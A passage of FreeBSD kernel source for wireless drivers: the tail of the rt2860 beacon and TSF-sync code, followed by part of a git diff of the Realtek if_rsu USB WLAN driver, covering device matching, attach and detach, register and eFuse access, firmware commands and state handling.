rt2860_setup_beacon(struct rt2860_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_beacon_offsets bo; struct rt2860_txwi txwi; struct mbuf *m; int ridx; if ((m = ieee80211_beacon_alloc(vap->iv_bss, &bo)) == NULL) return ENOBUFS; memset(&txwi, 0, sizeof txwi); txwi.wcid = 0xff; txwi.len = htole16(m->m_pkthdr.len); /* send beacons at the lowest available rate */ ridx = IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan) ? RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; txwi.phy = htole16(rt2860_rates[ridx].mcs); if (rt2860_rates[ridx].phy == IEEE80211_T_OFDM) txwi.phy |= htole16(RT2860_PHY_OFDM); txwi.txop = RT2860_TX_TXOP_HT; txwi.flags = RT2860_TX_TS; txwi.xflags = RT2860_TX_NSEQ; RAL_WRITE_REGION_1(sc, RT2860_BCN_BASE(0), (uint8_t *)&txwi, sizeof txwi); RAL_WRITE_REGION_1(sc, RT2860_BCN_BASE(0) + sizeof txwi, mtod(m, uint8_t *), m->m_pkthdr.len); m_freem(m); return 0; } static void rt2860_enable_tsf_sync(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); tmp &= ~0x1fffff; tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN; if (vap->iv_opmode == IEEE80211_M_STA) { /* * Local TSF is always updated with remote TSF on beacon * reception. */ tmp |= 1 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { tmp |= RT2860_BCN_TX_EN; /* * Local TSF is updated with remote TSF on beacon reception * only if the remote TSF is greater than local TSF. */ tmp |= 2 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (vap->iv_opmode == IEEE80211_M_HOSTAP) { tmp |= RT2860_BCN_TX_EN; /* SYNC with nobody */ tmp |= 3 << RT2860_TSF_SYNC_MODE_SHIFT; } RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp); } diff --git a/sys/dev/usb/wlan/if_rsu.c b/sys/dev/usb/wlan/if_rsu.c index 8bd23d102b2e..4e6ef7db1037 100644 --- a/sys/dev/usb/wlan/if_rsu.c +++ b/sys/dev/usb/wlan/if_rsu.c @@ -1,2488 +1,2488 @@ /* $OpenBSD: if_rsu.c,v 1.17 2013/04/15 09:23:01 mglocker Exp $ */ /*- * Copyright (c) 2010 Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * Driver for Realtek RTL8188SU/RTL8191SU/RTL8192SU. * * TODO: * o 11n support * o h/w crypto * o hostap / ibss / mesh */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR rsu_debug #include #include #ifdef USB_DEBUG static int rsu_debug = 0; SYSCTL_NODE(_hw_usb, OID_AUTO, rsu, CTLFLAG_RW, 0, "USB rsu"); SYSCTL_INT(_hw_usb_rsu, OID_AUTO, debug, CTLFLAG_RW, &rsu_debug, 0, "Debug level"); #endif static const STRUCT_USB_HOST_ID rsu_devs[] = { #define RSU_HT_NOT_SUPPORTED 0 #define RSU_HT_SUPPORTED 1 #define RSU_DEV_HT(v,p) { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, \ RSU_HT_SUPPORTED) } #define RSU_DEV(v,p) { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, \ RSU_HT_NOT_SUPPORTED) } RSU_DEV(ASUS, RTL8192SU), RSU_DEV(AZUREWAVE, RTL8192SU_4), RSU_DEV_HT(ACCTON, RTL8192SU), RSU_DEV_HT(ASUS, USBN10), RSU_DEV_HT(AZUREWAVE, RTL8192SU_1), RSU_DEV_HT(AZUREWAVE, RTL8192SU_2), RSU_DEV_HT(AZUREWAVE, RTL8192SU_3), RSU_DEV_HT(AZUREWAVE, RTL8192SU_5), RSU_DEV_HT(BELKIN, RTL8192SU_1), RSU_DEV_HT(BELKIN, RTL8192SU_2), RSU_DEV_HT(BELKIN, RTL8192SU_3), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_1), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_2), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_3), RSU_DEV_HT(COREGA, RTL8192SU), RSU_DEV_HT(DLINK2, DWA131A1), RSU_DEV_HT(DLINK2, RTL8192SU_1), RSU_DEV_HT(DLINK2, RTL8192SU_2), RSU_DEV_HT(EDIMAX, RTL8192SU_1), RSU_DEV_HT(EDIMAX, RTL8192SU_2), RSU_DEV_HT(EDIMAX, EW7622UMN), RSU_DEV_HT(GUILLEMOT, HWGUN54), RSU_DEV_HT(GUILLEMOT, HWNUM300), RSU_DEV_HT(HAWKING, RTL8192SU_1), RSU_DEV_HT(HAWKING, RTL8192SU_2), RSU_DEV_HT(PLANEX2, GWUSNANO), RSU_DEV_HT(REALTEK, RTL8171), RSU_DEV_HT(REALTEK, RTL8172), RSU_DEV_HT(REALTEK, RTL8173), RSU_DEV_HT(REALTEK, RTL8174), RSU_DEV_HT(REALTEK, RTL8192SU), RSU_DEV_HT(REALTEK, RTL8712), RSU_DEV_HT(REALTEK, RTL8713), RSU_DEV_HT(SENAO, RTL8192SU_1), RSU_DEV_HT(SENAO, RTL8192SU_2), RSU_DEV_HT(SITECOMEU, WL349V1), RSU_DEV_HT(SITECOMEU, WL353), RSU_DEV_HT(SWEEX2, LW154), #undef RSU_DEV_HT #undef RSU_DEV }; static device_probe_t rsu_match; static device_attach_t rsu_attach; static device_detach_t rsu_detach; static usb_callback_t rsu_bulk_tx_callback; static usb_callback_t rsu_bulk_rx_callback; static usb_error_t rsu_do_request(struct rsu_softc *, struct usb_device_request *, void *); static struct ieee80211vap * rsu_vap_create(struct ieee80211com *, const char name[], int, enum ieee80211_opmode, int, const uint8_t bssid[], const uint8_t mac[]); static void rsu_vap_delete(struct ieee80211vap *); static void rsu_scan_start(struct ieee80211com *); static void rsu_scan_end(struct ieee80211com *); static void rsu_set_channel(struct ieee80211com *); static void rsu_update_mcast(struct ifnet *); static int rsu_alloc_rx_list(struct rsu_softc *); static void rsu_free_rx_list(struct rsu_softc *); static int rsu_alloc_tx_list(struct rsu_softc *); static void rsu_free_tx_list(struct rsu_softc *); static void rsu_free_list(struct rsu_softc *, struct rsu_data [], int); static struct rsu_data *_rsu_getbuf(struct rsu_softc *); static struct rsu_data *rsu_getbuf(struct rsu_softc *); static int rsu_write_region_1(struct rsu_softc *, uint16_t, uint8_t *, int); static void rsu_write_1(struct rsu_softc *, uint16_t, uint8_t); static void rsu_write_2(struct rsu_softc *, uint16_t, uint16_t); static void rsu_write_4(struct rsu_softc *, uint16_t, uint32_t); static int rsu_read_region_1(struct rsu_softc *, uint16_t, uint8_t *, int); static uint8_t rsu_read_1(struct rsu_softc *, uint16_t); static uint16_t rsu_read_2(struct rsu_softc *, uint16_t); static uint32_t rsu_read_4(struct rsu_softc *, uint16_t); static int rsu_fw_iocmd(struct rsu_softc *, uint32_t); static uint8_t rsu_efuse_read_1(struct rsu_softc *, uint16_t); static int rsu_read_rom(struct rsu_softc *); static int rsu_fw_cmd(struct rsu_softc *, uint8_t, void *, int); static void rsu_calib_task(void *, int); static int rsu_newstate(struct ieee80211vap *, enum ieee80211_state, int); #ifdef notyet static void rsu_set_key(struct rsu_softc *, const struct ieee80211_key *); static void rsu_delete_key(struct rsu_softc *, const struct ieee80211_key *); #endif static int rsu_site_survey(struct rsu_softc *, struct ieee80211vap *); static int rsu_join_bss(struct rsu_softc *, struct ieee80211_node *); static int rsu_disconnect(struct rsu_softc *); static void rsu_event_survey(struct rsu_softc *, uint8_t *, int); static void rsu_event_join_bss(struct rsu_softc *, uint8_t *, int); static void rsu_rx_event(struct rsu_softc *, uint8_t, uint8_t *, int); static void rsu_rx_multi_event(struct rsu_softc *, uint8_t *, int); static int8_t rsu_get_rssi(struct rsu_softc *, int, void *); static struct mbuf * rsu_rx_frame(struct rsu_softc *, uint8_t *, int, int *); static struct mbuf * rsu_rx_multi_frame(struct rsu_softc *, uint8_t *, int, int *); static struct mbuf * rsu_rxeof(struct usb_xfer *, struct rsu_data *, int *); static void rsu_txeof(struct usb_xfer *, struct rsu_data *); static int rsu_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rsu_init(void *); static void rsu_init_locked(struct rsu_softc *); static void rsu_watchdog(void *); static int rsu_tx_start(struct rsu_softc *, struct ieee80211_node *, struct mbuf *, struct rsu_data *); static void rsu_start(struct ifnet *); static void rsu_start_locked(struct ifnet *); static int rsu_ioctl(struct ifnet *, u_long, caddr_t); static void rsu_stop(struct ifnet *, int); static void rsu_stop_locked(struct ifnet *, int); static device_method_t rsu_methods[] = { DEVMETHOD(device_probe, rsu_match), DEVMETHOD(device_attach, rsu_attach), DEVMETHOD(device_detach, rsu_detach), DEVMETHOD_END }; static driver_t rsu_driver = { .name = "rsu", .methods = rsu_methods, .size = sizeof(struct rsu_softc) }; static devclass_t rsu_devclass; DRIVER_MODULE(rsu, uhub, rsu_driver, rsu_devclass, NULL, 0); MODULE_DEPEND(rsu, wlan, 1, 1, 1); MODULE_DEPEND(rsu, usb, 1, 1, 1); MODULE_DEPEND(rsu, firmware, 1, 1, 1); MODULE_VERSION(rsu, 1); static const struct usb_config rsu_config[RSU_N_TRANSFER] = { [RSU_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = RSU_RXBUFSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = rsu_bulk_rx_callback }, [RSU_BULK_TX_BE] = { .type = UE_BULK, .endpoint = 0x06, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_BK] = { .type = UE_BULK, .endpoint = 0x06, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_VI] = { .type = UE_BULK, .endpoint = 0x04, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, [RSU_BULK_TX_VO] = { .type = UE_BULK, .endpoint = 0x04, .direction = UE_DIR_OUT, .bufsize = RSU_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = rsu_bulk_tx_callback, .timeout = RSU_TX_TIMEOUT }, }; static int rsu_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST || uaa->info.bIfaceIndex != 0 || uaa->info.bConfigIndex != 0) return (ENXIO); return (usbd_lookup_id_by_uaa(rsu_devs, sizeof(rsu_devs), uaa)); } static int rsu_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct rsu_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; int error; uint8_t iface_index, bands; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); TIMEOUT_TASK_INIT(taskqueue_thread, &sc->calib_task, 0, rsu_calib_task, sc); callout_init(&sc->sc_watchdog_ch, 0); iface_index = 0; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, rsu_config, RSU_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(sc->sc_dev, "could not allocate USB transfers, err=%s\n", usbd_errstr(error)); goto fail_usb; } RSU_LOCK(sc); /* Read chip revision. */ sc->cut = MS(rsu_read_4(sc, R92S_PMC_FSM), R92S_PMC_FSM_CUT); if (sc->cut != 3) sc->cut = (sc->cut >> 1) + 1; error = rsu_read_rom(sc); if (error != 0) { device_printf(self, "could not read ROM\n"); goto fail_rom; } RSU_UNLOCK(sc); IEEE80211_ADDR_COPY(sc->sc_bssid, &sc->rom[0x12]); device_printf(self, "MAC/BB RTL8712 cut %d\n", sc->cut); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(self, "cannot allocate interface\n"); goto fail_ifalloc; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "rsu", device_get_unit(self)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rsu_init; ifp->if_ioctl = rsu_ioctl; ifp->if_start = rsu_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ifp->if_capabilities |= IFCAP_RXCSUM; ifp->if_capenable |= IFCAP_RXCSUM; ifp->if_hwassist = CSUM_TCP; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* Not only, but not used. */ ic->ic_opmode = IEEE80211_M_STA; /* Default to BSS mode. */ /* Set device capabilities. */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_BGSCAN | /* Background scan. */ IEEE80211_C_SHPREAMBLE | /* Short preamble supported. */ IEEE80211_C_SHSLOT | /* Short slot time supported. */ IEEE80211_C_WPA; /* WPA/RSN. */ #if 0 /* Check if HT support is present. */ if (usb_lookup(rsu_devs_noht, uaa->vendor, uaa->product) == NULL) { /* Set HT capabilities. */ ic->ic_htcaps = IEEE80211_HTCAP_CBW20_40 | IEEE80211_HTCAP_DSSSCCK40; /* Set supported HT rates. */ for (i = 0; i < 2; i++) ic->ic_sup_mcs[i] = 0xff; } #endif /* Set supported .11b and .11g rates. */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = rsu_raw_xmit; ic->ic_scan_start = rsu_scan_start; ic->ic_scan_end = rsu_scan_end; ic->ic_set_channel = rsu_set_channel; ic->ic_vap_create = rsu_vap_create; ic->ic_vap_delete = rsu_vap_delete; ic->ic_update_mcast = rsu_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RSU_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RSU_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); fail_ifalloc: fail_rom: usbd_transfer_unsetup(sc->sc_xfer, RSU_N_TRANSFER); fail_usb: mtx_destroy(&sc->sc_mtx); return (ENXIO); } static int rsu_detach(device_t self) { struct rsu_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (!device_is_attached(self)) return (0); rsu_stop(ifp, 1); usbd_transfer_unsetup(sc->sc_xfer, RSU_N_TRANSFER); ieee80211_ifdetach(ic); callout_drain(&sc->sc_watchdog_ch); taskqueue_drain_timeout(taskqueue_thread, &sc->calib_task); /* Free Tx/Rx buffers. */ rsu_free_tx_list(sc); rsu_free_rx_list(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t rsu_do_request(struct rsu_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; RSU_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0 || !device_is_attached(sc->sc_dev)) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static struct ieee80211vap * rsu_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct rsu_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct rsu_vap *) malloc(sizeof(struct rsu_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = rsu_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void rsu_vap_delete(struct ieee80211vap *vap) { struct rsu_vap *uvp = RSU_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void rsu_scan_start(struct ieee80211com *ic) { int error; struct ifnet *ifp = ic->ic_ifp; struct rsu_softc *sc = ifp->if_softc; /* Scanning is done by the firmware. */ RSU_LOCK(sc); error = rsu_site_survey(sc, TAILQ_FIRST(&ic->ic_vaps)); RSU_UNLOCK(sc); if (error != 0) device_printf(sc->sc_dev, "could not send site survey command\n"); } static void rsu_scan_end(struct ieee80211com *ic) { /* Nothing to do here. */ } static void rsu_set_channel(struct ieee80211com *ic __unused) { /* We are unable to switch channels, yet. */ } static void rsu_update_mcast(struct ifnet *ifp) { /* XXX do nothing? */ } static int rsu_alloc_list(struct rsu_softc *sc, struct rsu_data data[], int ndata, int maxsz) { int i, error; for (i = 0; i < ndata; i++) { struct rsu_data *dp = &data[i]; dp->sc = sc; dp->m = NULL; dp->buf = malloc(maxsz, M_USBDEV, M_NOWAIT); if (dp->buf == NULL) { device_printf(sc->sc_dev, "could not allocate buffer\n"); error = ENOMEM; goto fail; } dp->ni = NULL; } return (0); fail: rsu_free_list(sc, data, ndata); return (error); } static int rsu_alloc_rx_list(struct rsu_softc *sc) { int error, i; error = rsu_alloc_list(sc, sc->sc_rx, RSU_RX_LIST_COUNT, RSU_RXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < RSU_RX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int rsu_alloc_tx_list(struct rsu_softc *sc) { int error, i; error = rsu_alloc_list(sc, sc->sc_tx, RSU_TX_LIST_COUNT, RSU_TXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < RSU_TX_LIST_COUNT; i++) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); } return (0); } static void rsu_free_tx_list(struct rsu_softc *sc) { rsu_free_list(sc, sc->sc_tx, RSU_TX_LIST_COUNT); } static void rsu_free_rx_list(struct rsu_softc *sc) { rsu_free_list(sc, sc->sc_rx, RSU_RX_LIST_COUNT); } static void rsu_free_list(struct rsu_softc *sc, struct rsu_data data[], int ndata) { int i; for (i = 0; i < ndata; i++) { struct rsu_data *dp = &data[i]; if (dp->buf != NULL) { free(dp->buf, M_USBDEV); dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static struct rsu_data * _rsu_getbuf(struct rsu_softc *sc) { struct rsu_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF("out of xmit buffers\n"); return (bf); } static struct rsu_data * rsu_getbuf(struct rsu_softc *sc) { struct rsu_data *bf; RSU_ASSERT_LOCKED(sc); bf = _rsu_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF("stop queue\n"); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int rsu_write_region_1(struct rsu_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = R92S_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (rsu_do_request(sc, &req, buf)); } static void rsu_write_1(struct rsu_softc *sc, uint16_t addr, uint8_t val) { rsu_write_region_1(sc, addr, &val, 1); } static void rsu_write_2(struct rsu_softc *sc, uint16_t addr, uint16_t val) { val = htole16(val); rsu_write_region_1(sc, addr, (uint8_t *)&val, 2); } static void rsu_write_4(struct rsu_softc *sc, uint16_t addr, uint32_t val) { val = htole32(val); rsu_write_region_1(sc, addr, (uint8_t *)&val, 4); } static int rsu_read_region_1(struct rsu_softc *sc, uint16_t addr, uint8_t *buf, int len) { usb_device_request_t req; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = R92S_REQ_REGS; USETW(req.wValue, addr); USETW(req.wIndex, 0); USETW(req.wLength, len); return (rsu_do_request(sc, &req, buf)); } static uint8_t rsu_read_1(struct rsu_softc *sc, uint16_t addr) { uint8_t val; if (rsu_read_region_1(sc, addr, &val, 1) != 0) return (0xff); return (val); } static uint16_t rsu_read_2(struct rsu_softc *sc, uint16_t addr) { uint16_t val; if (rsu_read_region_1(sc, addr, (uint8_t *)&val, 2) != 0) return (0xffff); return (le16toh(val)); } static uint32_t rsu_read_4(struct rsu_softc *sc, uint16_t addr) { uint32_t val; if (rsu_read_region_1(sc, addr, (uint8_t *)&val, 4) != 0) return (0xffffffff); return (le32toh(val)); } static int rsu_fw_iocmd(struct rsu_softc *sc, uint32_t iocmd) { int ntries; rsu_write_4(sc, R92S_IOCMD_CTRL, iocmd); DELAY(100); for (ntries = 0; ntries < 50; ntries++) { if (rsu_read_4(sc, R92S_IOCMD_CTRL) == 0) return (0); DELAY(10); } return (ETIMEDOUT); } static uint8_t rsu_efuse_read_1(struct rsu_softc *sc, uint16_t addr) { uint32_t reg; int ntries; reg = rsu_read_4(sc, R92S_EFUSE_CTRL); reg = RW(reg, R92S_EFUSE_CTRL_ADDR, addr); reg &= ~R92S_EFUSE_CTRL_VALID; rsu_write_4(sc, R92S_EFUSE_CTRL, reg); /* Wait for read operation to complete. */ for (ntries = 0; ntries < 100; ntries++) { reg = rsu_read_4(sc, R92S_EFUSE_CTRL); if (reg & R92S_EFUSE_CTRL_VALID) return (MS(reg, R92S_EFUSE_CTRL_DATA)); DELAY(5); } device_printf(sc->sc_dev, "could not read efuse byte at address 0x%x\n", addr); return (0xff); } static int rsu_read_rom(struct rsu_softc *sc) { uint8_t *rom = sc->rom; uint16_t addr = 0; uint32_t reg; uint8_t off, msk; int i; /* Make sure that ROM type is eFuse and that autoload succeeded. */ reg = rsu_read_1(sc, R92S_EE_9346CR); if ((reg & (R92S_9356SEL | R92S_EEPROM_EN)) != R92S_EEPROM_EN) return (EIO); /* Turn on 2.5V to prevent eFuse leakage. */ reg = rsu_read_1(sc, R92S_EFUSE_TEST + 3); rsu_write_1(sc, R92S_EFUSE_TEST + 3, reg | 0x80); DELAY(1000); rsu_write_1(sc, R92S_EFUSE_TEST + 3, reg & ~0x80); /* Read full ROM image. */ memset(&sc->rom, 0xff, sizeof(sc->rom)); while (addr < 512) { reg = rsu_efuse_read_1(sc, addr); if (reg == 0xff) break; addr++; off = reg >> 4; msk = reg & 0xf; for (i = 0; i < 4; i++) { if (msk & (1 << i)) continue; rom[off * 8 + i * 2 + 0] = rsu_efuse_read_1(sc, addr); addr++; rom[off * 8 + i * 2 + 1] = rsu_efuse_read_1(sc, addr); addr++; } } #ifdef USB_DEBUG if (rsu_debug >= 5) { /* Dump ROM content. */ printf("\n"); for (i = 0; i < sizeof(sc->rom); i++) printf("%02x:", rom[i]); printf("\n"); } #endif return (0); } static int rsu_fw_cmd(struct rsu_softc *sc, uint8_t code, void *buf, int len) { struct rsu_data *data; struct r92s_tx_desc *txd; struct r92s_fw_cmd_hdr *cmd; int cmdsz, xferlen; data = rsu_getbuf(sc); if (data == NULL) return (ENOMEM); /* Round-up command length to a multiple of 8 bytes. */ cmdsz = (len + 7) & ~7; xferlen = sizeof(*txd) + sizeof(*cmd) + cmdsz; KASSERT(xferlen <= RSU_TXBUFSZ, ("%s: invalid length", __func__)); memset(data->buf, 0, xferlen); /* Setup Tx descriptor. */ txd = (struct r92s_tx_desc *)data->buf; txd->txdw0 = htole32( SM(R92S_TXDW0_OFFSET, sizeof(*txd)) | SM(R92S_TXDW0_PKTLEN, sizeof(*cmd) + cmdsz) | R92S_TXDW0_OWN | R92S_TXDW0_FSG | R92S_TXDW0_LSG); txd->txdw1 = htole32(SM(R92S_TXDW1_QSEL, R92S_TXDW1_QSEL_H2C)); /* Setup command header. */ cmd = (struct r92s_fw_cmd_hdr *)&txd[1]; cmd->len = htole16(cmdsz); cmd->code = code; cmd->seq = sc->cmd_seq; sc->cmd_seq = (sc->cmd_seq + 1) & 0x7f; /* Copy command payload. */ memcpy(&cmd[1], buf, len); DPRINTFN(2, "Tx cmd code=0x%x len=0x%x\n", code, cmdsz); data->buflen = xferlen; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(sc->sc_xfer[RSU_BULK_TX_VO]); return (0); } /* ARGSUSED */ static void rsu_calib_task(void *arg, int pending __unused) { struct rsu_softc *sc = arg; uint32_t reg; DPRINTFN(6, "running calibration task\n"); RSU_LOCK(sc); #ifdef notyet /* Read WPS PBC status. */ rsu_write_1(sc, R92S_MAC_PINMUX_CTRL, R92S_GPIOMUX_EN | SM(R92S_GPIOSEL_GPIO, R92S_GPIOSEL_GPIO_JTAG)); rsu_write_1(sc, R92S_GPIO_IO_SEL, rsu_read_1(sc, R92S_GPIO_IO_SEL) & ~R92S_GPIO_WPS); reg = rsu_read_1(sc, R92S_GPIO_CTRL); if (reg != 0xff && (reg & R92S_GPIO_WPS)) DPRINTF(("WPS PBC is pushed\n")); #endif /* Read current signal level. */ if (rsu_fw_iocmd(sc, 0xf4000001) == 0) { reg = rsu_read_4(sc, R92S_IOCMD_DATA); DPRINTFN(8, "RSSI=%d%%\n", reg >> 4); } if (sc->sc_calibrating) { RSU_UNLOCK(sc); taskqueue_enqueue_timeout(taskqueue_thread, &sc->calib_task, hz * 2); } else RSU_UNLOCK(sc); } static int rsu_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rsu_vap *uvp = RSU_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rsu_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; struct ieee80211_rateset *rs; enum ieee80211_state ostate; int error, startcal = 0; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); if (ostate == IEEE80211_S_RUN) { RSU_LOCK(sc); /* Stop calibration. */ sc->sc_calibrating = 0; RSU_UNLOCK(sc); taskqueue_drain_timeout(taskqueue_thread, &sc->calib_task); /* Disassociate from our current BSS. */ RSU_LOCK(sc); rsu_disconnect(sc); } else RSU_LOCK(sc); switch (nstate) { case IEEE80211_S_INIT: break; case IEEE80211_S_AUTH: ni = ieee80211_ref_node(vap->iv_bss); error = rsu_join_bss(sc, ni); ieee80211_free_node(ni); if (error != 0) { device_printf(sc->sc_dev, "could not send join command\n"); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); rs = &ni->ni_rates; /* Indicate highest supported rate. */ ni->ni_txrate = rs->rs_rates[rs->rs_nrates - 1]; ieee80211_free_node(ni); startcal = 1; break; default: break; } sc->sc_calibrating = 1; RSU_UNLOCK(sc); IEEE80211_LOCK(ic); /* Start periodic calibration. */ taskqueue_enqueue_timeout(taskqueue_thread, &sc->calib_task, hz * 2); return (uvp->newstate(vap, nstate, arg)); } #ifdef notyet static void rsu_set_key(struct rsu_softc *sc, const struct ieee80211_key *k) { struct r92s_fw_cmd_set_key key; memset(&key, 0, sizeof(key)); /* Map net80211 cipher to HW crypto algorithm. */ switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: if (k->wk_keylen < 8) key.algo = R92S_KEY_ALGO_WEP40; else key.algo = R92S_KEY_ALGO_WEP104; break; case IEEE80211_CIPHER_TKIP: key.algo = R92S_KEY_ALGO_TKIP; break; case IEEE80211_CIPHER_AES_CCM: key.algo 